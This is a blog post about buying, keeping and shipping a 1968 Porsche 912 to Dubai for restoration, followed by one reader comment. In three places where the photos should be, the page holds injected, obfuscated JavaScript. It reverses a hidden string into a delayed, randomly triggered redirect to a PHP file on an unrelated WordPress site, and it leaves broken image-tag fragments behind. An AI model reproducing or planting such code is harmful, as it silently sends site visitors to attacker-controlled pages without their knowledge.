We have already talked about the Mercedes 500e that takes up a stack load of daily hack duties at the ranch and as awesome a car as it is, there has been a major hankering for some classic tweakage over the last couple of years that the Hammer just can’t undertake.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Porsche%20912/1968Porsche912002.jpg” width=”728″ />

Now I first stumbled across this Porsche 912 about 8 years ago at the Ace Cafe in the UK and instantly fell in love with it. I had just made the 100 mile drive to the Ace in the ’61 Double Door panel van I was looking after for the next owner and clocked it sat outside the main entrance looking awesome in the late summer evening sun. Suffice to say it took less time than expected to end up sat on my drive after a friend stuck his hand in the air for the panel van and I legged it down to London to do the deal.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Porsche%20912/1968Porsche912009.jpg” width=”728″ />

The little short wheel based ’12 was then driven pretty much everywhere you could think of over the next few years until my old man stepped up and took the ownership task on. As you can imagine being able to sell the ’12 and keep it in the family was awesome.Situations changed however about four years ago when a move back to the Middle East was committed to. It was decided to leave the 912 in the UK at the time, however four years down the track and the urge to the get the old girl out into the hot dust bowl of the UAE was just too much.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Porsche%20912/1968Porsche912006.jpg” width=”728″ />

So fast forward to present day and the 912 is now sat on the drive way in Dubai ready to tweaked, loved and generally brought back to its former glory. So there will be a long list of random parts ordered and delivered and more conjecture than you could think of over whether it should be returned to it’s original Orange or left as it stands.First things first though, I need to figure out why its on three cylinders instead of the customary four of the little boxer engine.

  1. So what’s up with the 500E? I sure would like to have that ride sitting in my driveway. Mark
